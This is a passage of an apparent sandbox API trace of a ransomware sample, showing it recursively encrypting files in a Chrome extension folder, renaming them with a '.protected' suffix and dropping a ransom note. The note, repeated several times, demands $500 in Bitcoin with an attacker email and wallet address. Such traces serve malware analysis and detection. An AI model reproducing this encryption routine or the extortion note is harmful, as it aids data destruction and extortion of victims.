Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.protected") returned 166 [0079.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.protected")) returned 1 [0079.266] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.266] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.266] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\RESTORE_FILES.txt") returned 160 [0079.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.266] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.266] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.267] lstrlenA (lpString="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") returned 684 [0079.267] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.267] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.267] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.268] CloseHandle (hObject=0x164) returned 1 [0079.268] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0079.268] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419") returned 146 [0079.268] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0079.268] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0079.268] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*") returned 148 [0079.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.268] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.268] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.268] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.268] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.268] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\.") returned 148 [0079.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.268] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.269] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.269] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.269] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.269] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.269] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.269] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\..") returned 149 [0079.269] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.269] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.269] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.269] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.269] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.269] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.269] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.269] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.270] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.270] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.270] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.270] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.271] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.271] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.272] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.272] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.272] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.272] CloseHandle (hObject=0x168) returned 1 [0079.272] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.protected") returned 170 [0079.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0079.273] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.273] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.273] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 164 [0079.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x164 [0079.273] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.273] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.274] lstrlenA (lpString="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") returned 684 [0079.274] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.274] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.274] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.274] CloseHandle (hObject=0x164) returned 1 [0079.274] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.274] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0079.274] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0079.274] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0079.274] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0079.274] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0079.275] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et") returned 142 [0079.275] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0079.275] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0079.275] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*") returned 144 [0079.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.275] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.275] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.275] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.275] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.275] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.275] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\.") returned 144 [0079.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.275] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.275] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.275] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.275] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\..") returned 145 [0079.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.275] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.275] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.276] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.276] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.276] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.276] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.276] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.276] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0079.277] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.277] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0079.277] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.278] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.278] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.278] CloseHandle (hObject=0x168) returned 1 [0079.278] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.protected") returned 166 [0079.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.protected")) returned 1 [0079.278] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.279] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.279] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\RESTORE_FILES.txt") returned 160 [0079.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.279] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure 